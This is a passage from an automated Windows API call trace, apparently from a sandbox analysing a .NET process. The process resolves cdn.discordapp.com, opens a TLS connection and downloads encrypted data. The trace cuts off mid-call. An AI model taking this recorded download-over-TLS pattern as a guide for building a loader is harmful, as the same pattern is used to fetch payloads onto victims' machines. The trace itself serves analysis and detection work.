dwFlags=0x1) returned 0x4ec [0138.804] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4bc [0138.805] GetAddrInfoW (in: pNodeName="cdn.discordapp.com", pServiceName=0x0, pHints=0x19f12c*(ai_flags=2, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f0d4 | out: ppResult=0x19f0d4*=0x5303a8*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="cdn.discordapp.com", ai_addr=0x53f700*(sa_family=2, sin_port=0x0, sin_addr="162.159.135.233"), ai_next=0x530010*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x53f808*(sa_family=2, sin_port=0x0, sin_addr="162.159.130.233"), ai_next=0x52ff70*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x53f970*(sa_family=2, sin_port=0x0, sin_addr="162.159.134.233"), ai_next=0x5303d0*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x53f9b8*(sa_family=2, sin_port=0x0, sin_addr="162.159.129.233"), ai_next=0x530308*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x53f928*(sa_family=2, sin_port=0x0, sin_addr="162.159.133.233"), ai_next=0x0)))))) returned 0 [0138.850] FreeAddrInfoW (pAddrInfo=0x5303a8*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="cdn.discordapp.com", ai_addr=0x53f700*(sa_family=2, sin_port=0x0, sin_addr="162.159.135.233"), ai_next=0x530010*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x53f808*(sa_family=2, sin_port=0x0, sin_addr="162.159.130.233"), ai_next=0x52ff70*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x53f970*(sa_family=2, sin_port=0x0, sin_addr="162.159.134.233"), ai_next=0x5303d0*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x53f9b8*(sa_family=2, sin_port=0x0, sin_addr="162.159.129.233"), ai_next=0x530308*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x53f928*(sa_family=2, sin_port=0x0, sin_addr="162.159.133.233"), ai_next=0x0)))))) [0138.853] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4f4 [0138.854] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x518 [0138.854] ioctlsocket (in: s=0x4f4, cmd=-2147195266, argp=0x19f104 | out: argp=0x19f104) returned 0 [0138.854] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x51c [0138.854] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x520 [0138.854] ioctlsocket (in: s=0x51c, cmd=-2147195266, argp=0x19f104 | out: argp=0x19f104) returned 0 [0138.854] WSAIoctl (in: s=0x4f4, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x19f0ec, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x19f0ec, lpOverlapped=0x0) returned -1 [0138.854] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x19ee1c, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0138.854] WSAEventSelect (s=0x4f4, hEventObject=0x518, lNetworkEvents=512) returned 0 [0138.854] WSAIoctl (in: s=0x51c, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x19f0ec, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x19f0ec, lpOverlapped=0x0) returned -1 [0138.854] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x19ee1c, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0138.854] WSAEventSelect (s=0x51c, hEventObject=0x520, lNetworkEvents=512) returned 0 [0138.855] GetAdaptersAddresses (in: Family=0x0, Flags=0x2e, Reserved=0x0, AdapterAddresses=0x0, SizePointer=0x19f0e8*=0x0 | out: AdapterAddresses=0x0, SizePointer=0x19f0e8*=0xa80) returned 0x6f [0138.858] LocalAlloc (uFlags=0x0, uBytes=0xa80) returned 0x540458 [0138.858] GetAdaptersAddresses (in: Family=0x0, Flags=0x2e, Reserved=0x0, AdapterAddresses=0x540458, SizePointer=0x19f0e8*=0xa80 | out: AdapterAddresses=0x540458*(Alignment=0x600000178, Length=0x178, IfIndex=0x6, Next=0x540708, AdapterName="{E96D977E-F067-4CE9-924D-F6E0A04729E4}", FirstUnicastAddress=0x54067c, FirstAnycastAddress=0x0, FirstMulticastAddress=0x0, FirstDnsServerAddress=0x0, DnsSuffix="", Description="Intel(R) 82574L Gigabit Network Connection #2", FriendlyName="Ethernet 2", PhysicalAddress=([0]=0x0, [1]=0x14, [2]=0xc6, [3]=0x42, [4]=0xf0, [5]=0x9, [6]=0x0, [7]=0x0), PhysicalAddressLength=0x6, Flags=0x1c5, DdnsEnabled=0x1c5, RegisterAdapterSuffix=0x1c5, Dhcpv4Enabled=0x1c5, ReceiveOnly=0x1c5, NoMulticast=0x1c5, Ipv6OtherStatefulConfig=0x1c5, NetbiosOverTcpipEnabled=0x1c5, Ipv4Enabled=0x1c5, Ipv6Enabled=0x1c5, Ipv6ManagedAddressConfigurationSupported=0x1c5, Mtu=0x5dc, IfType=0x6, OperStatus=0x1, Ipv6IfIndex=0x6, ZoneIndices=([0]=0x6, [1]=0x6, [2]=0x6, [3]=0x6, [4]=0x1, [5]=0x1, [6]=0x1, [7]=0x1, [8]=0x1, [9]=0x1, [10]=0x1, [11]=0x1, [12]=0x1, [13]=0x1, [14]=0x0, [15]=0x1), FirstPrefix=0x0, TransmitLinkSpeed=0x3b9aca00, ReceiveLinkSpeed=0x3b9aca00, FirstWinsServerAddress=0x0, FirstGatewayAddress=0x0, Ipv4Metric=0xa, Ipv6Metric=0xa, Luid=0x6008002000000, Dhcpv4Server.lpSockaddr=0x5405d0*(sa_family=2, sin_port=0x0, sin_addr="192.168.0.1"), Dhcpv4Server.iSockaddrLength=16, CompartmentId=0x1, NetworkGuid=0x11eb6c9dc20d55b0, ConnectionType=0x1, TunnelType=0x0, Dhcpv6Server.lpSockaddr=0x0, Dhcpv6Server.iSockaddrLength=0, Dhcpv6ClientDuid=([0]=0x0, [1]=0x1, [2]=0x0, [3]=0x1, [4]=0x28, [5]=0xb6, [6]=0x28, [7]=0x5e, [8]=0x0, [9]=0xf, [10]=0xf3, [11]=0xe1, [12]=0x61, [13]=0x38, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0), Dhcpv6ClientDuidLength=0xe, Dhcpv6Iaid=0x6000ff3, FirstDnsSuffix=0x0), SizePointer=0x19f0e8*=0xa80) returned 0x0 [0138.879] LocalFree (hMem=0x540458) returned 0x0 [0138.881] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f104 | out: phkResult=0x19f104*=0x524) returned 0x0 [0138.881] RegQueryValueExW (in: hKey=0x524, lpValueName="HWRPortReuseOnSocketBind", lpReserved=0x0, lpType=0x19f120, lpData=0x0, lpcbData=0x19f11c*=0x0 | out: lpType=0x19f120*=0x0, lpData=0x0, lpcbData=0x19f11c*=0x0) returned 0x2 [0138.881] RegCloseKey (hKey=0x524) returned 0x0 [0138.882] WSAConnect (in: s=0x4ec, name=0x22ad640*(sa_family=2, sin_port=0x1bb, sin_addr="162.159.135.233"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0 [0138.907] closesocket (s=0x4bc) returned 0 [0138.930] EnumerateSecurityPackagesW (in: pcPackages=0x19f07c, ppPackageInfo=0x19f010 | out: pcPackages=0x19f07c, ppPackageInfo=0x19f010) returned 0x0 [0138.947] FreeContextBuffer (in: pvContextBuffer=0x5390c8 | out: pvContextBuffer=0x5390c8) returned 0x0 [0138.955] GetCurrentProcess () returned 0xffffffff [0138.955] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19ee5c | out: TokenHandle=0x19ee5c*=0x528) returned 1 [0138.956] AcquireCredentialsHandleW (in: pPrincipal=0x0, pPackage=0x22ae774, fCredentialUse=0x2, pvLogonId=0x0, pAuthData=0x19eeb0, pGetKeyFn=0x0, pvGetKeyArgument=0x0, phCredential=0x22afd00, ptsExpiry=0x19ee34 | out: phCredential=0x22afd00, ptsExpiry=0x19ee34) returned 0x0 [0138.971] InitializeSecurityContextW (in: phCredential=0x19ee74, phContext=0x0, pTargetName=0x22ad73c, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x0, Reserved2=0x0, phNewContext=0x22aff04, pOutput=0x22afe9c, pfContextAttr=0x22ae748, ptsExpiry=0x19ee6c | out: phNewContext=0x22aff04, pOutput=0x22afe9c, pfContextAttr=0x22ae748, ptsExpiry=0x19ee6c) returned 0x90312 [0138.973] FreeContextBuffer (in: pvContextBuffer=0x529380 | out: pvContextBuffer=0x529380) returned 0x0 [0138.979] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76720000 [0138.980] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x400, lpWideCharStr="AppPolicyGetClrCompat", cchWideChar=21, lpMultiByteStr=0x19eeb0, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppPolicyGetClrCompatÃ\x8fgúKÍ/(ú7ihö\x19", lpUsedDefaultChar=0x0) returned 21 [0138.980] GetProcAddress (hModule=0x76720000, lpProcName="AppPolicyGetClrCompat") returned 0x0 [0138.980] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76720000 [0138.980] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x400, lpWideCharStr="GetCurrentPackageId", cchWideChar=19, lpMultiByteStr=0x19eeb0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetCurrentPackageId", lpUsedDefaultChar=0x0) returned 19 [0138.980] GetProcAddress (hModule=0x76720000, lpProcName="GetCurrentPackageId") returned 0x769cded0 [0138.980] GetCurrentPackageId () returned 0x3d54 [0138.982] send (s=0x4ec, buf=0x22aff18*, len=182, flags=0) returned 182 [0138.985] recv (in: s=0x4ec, buf=0x22aff18, len=5, flags=0 | out: buf=0x22aff18*) returned 5 [0139.006] recv (in: s=0x4ec, buf=0x22aff1d, len=67, flags=0 | out: buf=0x22aff1d*) returned 67 [0139.007] InitializeSecurityContextW (in: phCredential=0x19edd8, phContext=0x19ee64, pTargetName=0x22ad73c, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x22b032c, Reserved2=0x0, phNewContext=0x22aff04, pOutput=0x22b0340, pfContextAttr=0x22ae748, ptsExpiry=0x19edd0 | out: phNewContext=0x22aff04, pOutput=0x22b0340, pfContextAttr=0x22ae748, ptsExpiry=0x19edd0) returned 0x90312 [0139.010] recv (in: s=0x4ec, buf=0x22b03d0, len=5, flags=0 | out: buf=0x22b03d0*) returned 5 [0139.011] recv (in: s=0x4ec, buf=0x22b03e9, len=2334, flags=0 | out: buf=0x22b03e9*) returned 2334 [0139.011] InitializeSecurityContextW (in: phCredential=0x19ed40, phContext=0x19edcc, pTargetName=0x22ad73c, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x22b0d78, Reserved2=0x0, phNewContext=0x22aff04, pOutput=0x22b0d8c, pfContextAttr=0x22ae748, ptsExpiry=0x19ed38 | out: phNewContext=0x22aff04, pOutput=0x22b0d8c, pfContextAttr=0x22ae748, ptsExpiry=0x19ed38) returned 0x90312 [0139.015] recv (in: s=0x4ec, buf=0x22b0e1c, len=5, flags=0 | out: buf=0x22b0e1c*) returned 5 [0139.016] recv (in: s=0x4ec, buf=0x22b0e35, len=149, flags=0 | out: buf=0x22b0e35*) returned 149 [0139.016] InitializeSecurityContextW (in: phCredential=0x19eca8, phContext=0x19ed34, pTargetName=0x22ad73c, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x22b0f3c, Reserved2=0x0, phNewContext=0x22aff04, pOutput=0x22b0f50, pfContextAttr=0x22ae748, ptsExpiry=0x19eca0 | out: phNewContext=0x22aff04, pOutput=0x22b0f50, pfContextAttr=0x22ae748, ptsExpiry=0x19eca0) returned 0x90312 [0139.016] recv (in: s=0x4ec, buf=0x22b0fe0, len=5, flags=0 | out: buf=0x22b0fe0*) returned 5 [0139.017] recv (in: s=0x4ec, buf=0x22b0ff9, len=4, flags=0 | out: buf=0x22b0ff9*) returned 4 [0139.017] InitializeSecurityContextW (in: phCredential=0x19ec10, phContext=0x19ec9c, pTargetName=0x22ad73c, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x22b1070, Reserved2=0x0, phNewContext=0x22aff04, pOutput=0x22b1084, pfContextAttr=0x22ae748, ptsExpiry=0x19ec08 | out: phNewContext=0x22aff04, pOutput=0x22b1084, pfContextAttr=0x22ae748, ptsExpiry=0x19ec08) returned 0x90312 [0139.375] FreeContextBuffer (in: pvContextBuffer=0x4fada8 | out: pvContextBuffer=0x4fada8) returned 0x0 [0139.375] send (s=0x4ec, buf=0x22b1100*, len=126, flags=0) returned 126 [0139.376] recv (in: s=0x4ec, buf=0x22b1100, len=5, flags=0 | out: buf=0x22b1100*) returned 5 [0139.400] recv (in: s=0x4ec, buf=0x22b11a5, len=202, flags=0 | out: buf=0x22b11a5*) returned 202 [0139.400] InitializeSecurityContextW (in: phCredential=0x19eb78, phContext=0x19ec04, pTargetName=0x22ad73c, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x22b12e0, Reserved2=0x0, phNewContext=0x22aff04, pOutput=0x22b12f4, pfContextAttr=0x22ae748, ptsExpiry=0x19eb70 | out: phNewContext=0x22aff04, pOutput=0x22b12f4, pfContextAttr=0x22ae748, ptsExpiry=0x19eb70) returned 0x90312 [0139.403] recv (in: s=0x4ec, buf=0x22b1384, len=5, flags=0 | out: buf=0x22b1384*) returned 5 [0139.404] recv (in: s=0x4ec, buf=0x22b139d, len=1, flags=0 | out: buf=0x22b139d*) returned 1 [0139.404] InitializeSecurityContextW (in: phCredential=0x19eae0, phContext=0x19eb6c, pTargetName=0x22ad73c, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x22b1410, Reserved2=0x0, phNewContext=0x22aff04, pOutput=0x22b1424, pfContextAttr=0x22ae748, ptsExpiry=0x19ead8 | out: phNewContext=0x22aff04, pOutput=0x22b1424, pfContextAttr=0x22ae748, ptsExpiry=0x19ead8) returned 0x90312 [0139.404] recv (in: s=0x4ec, buf=0x22b14b4, len=5, flags=0 | out: buf=0x22b14b4*) returned 5 [0139.404] recv (in: s=0x4ec, buf=0x22b14cd, len=40, flags=0 | out: buf=0x22b14cd*) returned 40 [0139.404] InitializeSecurityContextW (in: phCredential=0x19ea48, phContext=0x19ead4, pTargetName=0x22ad73c, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x22b1568, Reserved2=0x0, phNewContext=0x22aff04, pOutput=0x22b157c, pfContextAttr=0x22ae748, ptsExpiry=0x19ea40 | out: phNewContext=0x22aff04, pOutput=0x22b157c, pfContextAttr=0x22ae748, ptsExpiry=0x19ea40) returned 0x0 [0139.434] QueryContextAttributesW (in: phContext=0x22aff04, ulAttribute=0x4, pBuffer=0x22b1628 | out: pBuffer=0x22b1628) returned 0x0 [0139.434] QueryContextAttributesW (in: phContext=0x22aff04, ulAttribute=0x5a, pBuffer=0x22b1680 | out: pBuffer=0x22b1680) returned 0x0 [0139.444] QueryContextAttributesW (in: phContext=0x22aff04, ulAttribute=0x53, pBuffer=0x22b1934 | out: pBuffer=0x22b1934) returned 0x0 [0139.456] CertDuplicateCertificateContext (pCertContext=0x4f6020) returned 0x4f6020 [0139.457] CertDuplicateStore (hCertStore=0x51d530) returned 0x51d530 [0139.457] CertEnumCertificatesInStore (hCertStore=0x51d530, pPrevCertContext=0x0) returned 0x4f6840 [0139.457] CertDuplicateCertificateContext (pCertContext=0x4f6840) returned 0x4f6840 [0139.458] CertEnumCertificatesInStore (hCertStore=0x51d530, pPrevCertContext=0x4f6840) returned 0x4f6020 [0139.458] CertDuplicateCertificateContext (pCertContext=0x4f6020) returned 0x4f6020 [0139.458] CertEnumCertificatesInStore (hCertStore=0x51d530, pPrevCertContext=0x4f6020) returned 0x0 [0139.458] CertCloseStore (hCertStore=0x51d530, dwFlags=0x0) returned 1 [0139.458] CertFreeCertificateContext (pCertContext=0x4f6020) returned 1 [0139.491] CertOpenStore (lpszStoreProvider=0x2, dwEncodingType=0x10001, hCryptProv=0x0, dwFlags=0x2204, pvPara=0x0) returned 0x51d698 [0139.498] CertAddCRLLinkToStore (in: hCertStore=0x51d698, pCrlContext=0x4f6840, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1 [0139.499] CertAddCRLLinkToStore (in: hCertStore=0x51d698, pCrlContext=0x4f6020, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1 [0139.506] CertGetCertificateChain (in: hChainEngine=0x0, pCertContext=0x4f6020, pTime=0x19ea54, hAdditionalStore=0x51d698, pChainPara=0x19e994, dwFlags=0x0, pvReserved=0x0, ppChainContext=0x19e988 | out: ppChainContext=0x19e988) returned 1 [0139.527] CertDuplicateCertificateChain (pChainContext=0x5437d8) returned 0x5437d8 [0139.528] CertDuplicateCertificateContext (pCertContext=0x4f6020) returned 0x4f6020 [0139.528] CertDuplicateCertificateContext (pCertContext=0x4f60c0) returned 0x4f60c0 [0139.528] CertDuplicateCertificateContext (pCertContext=0x543370) returned 0x543370 [0139.528] CertFreeCertificateChain (pChainContext=0x5437d8) [0139.529] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x1, pChainContext=0x5437d8, pPolicyPara=0x19eb34, pPolicyStatus=0x19eb20 | out: pPolicyStatus=0x19eb20) returned 1 [0139.530] SetLastError (dwErrCode=0x0) [0139.533] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x4, pChainContext=0x5437d8, pPolicyPara=0x19eba0, pPolicyStatus=0x19eb48 | out: pPolicyStatus=0x19eb48) returned 1 [0139.538] CertFreeCertificateChain (pChainContext=0x5437d8) [0139.538] CertFreeCertificateContext (pCertContext=0x4f6020) returned 1 [0139.545] CoTaskMemAlloc (cb=0x20c) returned 0x5437d8 [0139.545] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.SslStream_Disabled", lpBuffer=0x5437d8, nSize=0x104 | out: lpBuffer="") returned 0x0 [0139.545] CoTaskMemFree (pv=0x5437d8) [0139.545] CoTaskMemAlloc (cb=0x20c) returned 0x5437d8 [0139.545] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.SslStream_MinCount", lpBuffer=0x5437d8, nSize=0x104 | out: lpBuffer="") returned 0x0 [0139.545] CoTaskMemFree (pv=0x5437d8) [0139.545] CoTaskMemAlloc (cb=0x20c) returned 0x5437d8 [0139.545] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.SslStream_Disabled", lpBuffer=0x5437d8, nSize=0x104 | out: lpBuffer="") returned 0x0 [0139.545] CoTaskMemFree (pv=0x5437d8) [0139.545] CoTaskMemAlloc (cb=0x20c) returned 0x5437d8 [0139.545] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.SslStream_MinCount", lpBuffer=0x5437d8, nSize=0x104 | out: lpBuffer="") returned 0x0 [0139.545] CoTaskMemFree (pv=0x5437d8) [0139.547] EncryptMessage (in: phContext=0x22aff04, fQOP=0x0, pMessage=0x22b9aa8, MessageSeqNo=0x0 | out: pMessage=0x22b9aa8) returned 0x0 [0139.548] send (s=0x4ec, buf=0x22b8580*, len=158, flags=0) returned 158 [0139.549] setsockopt (s=0x4ec, level=65535, optname=4102, optval=" \x86\x01", optlen=4) returned 0 [0139.551] recv (in: s=0x4ec, buf=0x22c5db8, len=5, flags=0 | out: buf=0x22c5db8*) returned 5 [0139.587] recv (in: s=0x4ec, buf=0x22c5dbd, len=1393, flags=0 | out: buf=0x22c5dbd*) returned 1393 [0139.590] DecryptMessage (in: phContext=0x22aff04, pMessage=0x22c9e78, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x22c9e78, pfQOP=0x0) returned 0x0 [0139.598] recv (in: s=0x4ec, buf=0x22c5db8, len=5, flags=0 | out: buf=0x22c5db8*) returned 5 [0139.598] recv (in: s=0x4ec, buf=0x22c5dbd, len=101, flags=0 | out: buf=0x22c5dbd*) returned 101 [0139.598] DecryptMessage (in: phContext=0x22aff04, pMessage=0x22cca98, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x22cca98, pfQOP=0x0) returned 0x0 [0139.612] setsockopt (s=0x4ec, level=65535, optname=4102, optval="à\x93\x04", optlen=4) returned 0 [0139.612] recv (in: s=0x4ec, buf=0x22c5db8, len=5, flags=0 | out: buf=0x22c5db8*) returned 5 [0139.612] recv (in: s=0x4ec, buf=0x22c5dbd, len=1393, flags=0 | out: buf=0x22c5dbd*) returned 1393 [0139.612] DecryptMessage (in: phContext=0x22aff04, pMessage=0x22ed2f4, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x22ed2f4, pfQOP=0x0) returned 0x0 [0139.613] recv (in: s=0x4ec, buf=0x22c5db8, len=5, flags=0 | out: buf=0x22c5db8*) returned 5 [0139.613] recv (in: s=0x4ec, buf=0x22c5dbd, len=1393, flags=0 | out: buf=0x22c5dbd*) returned 1393 [0139.613] DecryptMessage (in: phContext=0x22aff04, pMessage=0x22ed408, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x22ed408, pfQOP=0x0) returned 0x0 [0139.613] recv (in: s=0x4ec, buf=0x22c5db8, len=5, flags=0 | out: buf=0x22c5db8*) returned 5 [0139.614] recv (in: s=0x4ec, buf=0x22c5dbd, len=1393, flags=0 | out: buf=0x22c5dbd*) returned 1393 [0139.614] DecryptMessage (in: phContext=0x22aff04, pMessage=0x22ed51c, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x22ed51c, pfQOP=0x0) returned 0x0 [0139.614] recv (in: s=0x4ec, buf=0x22c5db8, len=5, flags=0 | out: buf=0x22c5db8*) returned 5 [0139.614] recv (in: s=0x4ec, buf=0x22c5dbd, len=1393, flags=0 | out: buf=0x22c5dbd*) returned 1393 [0139.614] DecryptMessage (in: phContext=0x22aff04, pMessage=0x22ed630, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x22ed630, pfQOP=0x0) returned 0x0 [0139.615] recv (in: s=0x4ec, buf=0x22c5db8, len=5, flags=0 | out: buf=0x22c5db8*) returned 5 [0139.615] recv (in: s=0x4ec, buf=0x22c5dbd, len=1393, flags=0 | out: buf=0x22c5dbd*) returned 1393 [0139.615] DecryptMessage (in: phContext=0x22aff04, pMessage=0x22ed744, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x22ed744, pfQOP=0x0) returned 0x0 [0139.615] recv (in: s=0x4ec, buf=0x22c5db8, len=5, flags=0 | out: buf=0x22c5db8*) returned 5 [0139.615] recv (in: s=0x4ec, buf=0x22c5dbd, len=1393, flags=0 | out: buf=0x22c5dbd*) returned 1393 [0139.615] DecryptMessage (in: phContext=0x22aff04, pMessage=0x22ed858, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x22ed858, pfQOP=0x0) returned 0x0 [0139.615] recv (in: s=0x4ec, buf=0x22c5db8, len=5, flags=0 | out: buf=0x22c5db8*) returned 5 [0139.615] recv (in: s=0x4ec, buf=0x22c5dbd, len=1393, flags=0 | out: buf=0x22c5dbd*) returned 1393 [0139.615] DecryptMessage (in: phContext=0x22aff04, pMessage=0x22ed96c, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x22ed96c, pfQOP=0x0) returned 0x0 [0139.615] recv (in: s=0x4ec, buf=0x22c5db8, len=5, flags=0 | out: buf=0x22c5db8*) returned 5 [0139.615] recv (in: s=0x4ec, buf=0x22c5dbd, len=1393, flags=0 | out: buf=0x22c5dbd*) returned 1393 [0139.615] DecryptMessage (in: phContext=0x22aff04, pMessage=0x22eda80, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x22eda80, pfQOP=0x0) returned 0x0 [0139.616] recv (in: s=0x4ec, buf=0x22c5db8, len=5, flags=0 | out: buf=0x22c5db8*) returned 5 [0139.616] recv (in: s=0x4ec, buf=0x22c5dbd, len=1393, flags=0 | out: buf=0x22c5dbd*) returned 1393 [0139.616] DecryptMessage (in: phContext=0x22aff04, pMessage=0x22edb94, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x22edb94, pfQOP=0x0) returned 0x0 [0139.616] recv (in: s=0x4ec, buf=0x22c5db8, len=5, flags=0 | out: buf=0x22c5db8*) returned 5 [0139.616] recv (in: s=0x4ec, buf=0x22c5dbd, len=1393, flags=0 | out: buf=0x22c5dbd*) returned 1393 [0139.616] DecryptMessage (in: phContext=0x22aff04, pMessage=0x22edca8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x22edca8, pfQOP=0x0) returned 0x0 [0139.616] recv (in: s=0x4ec, buf=0x22c5db8, len=5, flags=0 | out: buf=0x22c5db8*) returned 5 [0139.616] recv (in: s=0x4ec, buf=0x22c5dbd, len=1393, flags=0 | out: buf=0x22c5dbd*) returned 1393 [0139.616] DecryptMessage (in: phContext=0x22aff04, pMessage=0x22eddbc, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x22eddbc, pfQOP=0x0) returned 0x0 [0139.616] recv (in: s=0x4ec, buf=0x22c5db8, len=5, flags=0 | out: buf=0x22c5db8*) returned 5 [0139.616] recv (in: s=0x4ec, buf=0x22c5dbd, len=1393, flags=0 | out: buf=0x22c5dbd*) returned 1393 [0139.617] DecryptMessage (in: phContext=0x22aff04, pMessage=0x22eded0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x22eded0, pfQOP=0x0) returned 0x0 [0139.617] recv (in: s=0x4ec, buf=0x22c5db8, len=5, flags=0 | out: buf=0x22c5db8*) returned 5 [0139.617] recv (in: s=0x4ec, buf=0x22c5dbd, len=1393, flags=0 | out: buf=0x22c5dbd*) returned 1393 [0139.617] DecryptMessage (in: phContext=0x22aff04, pMessage=0x22edfe4, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x22edfe4, pfQOP=0x0) returned 0x0 [0139.617] recv (in: s=0x4ec, buf=0x22c5db8, len=5, flags=0 | out: buf=0x22c5db8*) returned 5 [0139.617] recv (in: s=0x4ec, 